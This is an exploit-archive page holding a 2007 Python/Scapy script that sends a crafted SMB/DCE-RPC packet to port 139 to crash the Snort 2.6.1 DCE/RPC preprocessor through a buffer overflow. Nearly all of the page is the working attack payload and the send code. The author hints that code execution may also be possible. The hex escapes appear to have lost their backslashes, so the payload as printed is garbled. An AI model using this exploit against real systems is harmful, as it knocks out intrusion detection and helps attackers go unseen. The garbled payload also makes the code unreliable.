Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit
# Published : 2007-02-23
# Author : Trirat Puttaraksa
# Previous Title : XM Easy Personal FTP Server 5.30 (ABOR) Format String DoS Exploit
# Next Title : BrowseDialog Class (ccrpbds6.dll) Multiple Methods DoS Exploit

#!/usr/bin/python
#
# Snort DCE/RPC Preprocessor Buffer Overflow (DoS)
# 
# Author: Trirat Puttaraksa <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
#
######################################################
# For educational purpose only
#
# This exploit just crash Snort 2.6.1 on Fedora Core 4. However, Code Execution
# may be possible, but I have no time to make it :( 
# I will post the information about this vulnerability in my blog soon
#
# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/) 
# to inject the packet, so you have to install Scapy before use it.
#
#######################################################

import sys
from scapy import *
from struct import pack
conf.verb = 0

# NetBIOS Session Service
payload = "x00x00x01xa6"

# SMB Header
payload += "xffx53x4dx42x75x00x00x00x00x18x07xc8x00x00"
payload += "x00x00x00x00x00x00x00x00x00x00x00x00xffxfe"
payload += "x00x08x30x00"

# Tree Connect AndX Request
payload += "x04xa2x00x52x00x08x00x01x00x27x00x00"
payload += "x5cx00x5cx00x49x00x4ex00x53x00x2dx00x4bx00x49x00"
payload += "x52x00x41x00x5cx00x49x00x50x00x43x00x24x00x00x00"
payload += "x3fx3fx3fx3fx3fx00"

# NT Create AndX Request
payload += "x18x2fx00x96x00x00x0ex00x16x00x00x00x00x00x00x00"
payload += "x9fx01x02x00x00x00x00x00x00x00x00x00x00x00x00x00"
payload += "x03x00x00x00x01x00x00x00x40x00x40x00x02x00x00x00"
payload += "x01x11x00x00x5cx00x73x00x72x00x76x00x73x00x76x00"
payload += "x63x00x00x00"

# Write AndX Request #1
payload += "x0ex2fx00xfex00x00x40x00x00x00x00xffxffxffxffx80"
payload += "x00x48x00x00x00x48x00xb6x00x00x00x00x00x49x00xee"

payload += "x05x00x0bx03x10x00x00x00xffx01x00x00x01x00x00x00"
payload += "xb8x10xb8x10x00x00x00x00x01x00x00x00x00x00x01x00"
payload += "xc8x4fx32x4bx70x16xd3x01x12x78x5ax47xbfx6exe1x88"
payload += "x03x00x00x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00"
payload += "x2bx10x48x60x02x00x00x00"

# Write AndX Request #2
payload += "x0exffx00xdexdex00x40x00x00x00x00xffxffxffxffx80"
payload += "x00x48x00x00x00xffx01x30x01x00x00x00x00x49x00xee"

payload += "x05x00x0bx03x10x00x00x00x48x00x00x00x01x00x00x00"
payload += "xb8x10xb8x10x00x00x00x00x01x00x00x00x00x00x01x00"
payload += "xc8x4fx32x4bx70x16xd3x01x12x78x5ax47xbfx6exe1x88"
payload += "x03x00x00x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00"
payload += "x2bx10x48x60x02x00x00x00"

if len(sys.argv) != 2:
	print "Usage snort_dos_dcerpc.py <fake destination ip>"
	sys.exit(1)

target = sys.argv[1]

p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload
send(p)

# www.Syue.com [2007-02-23]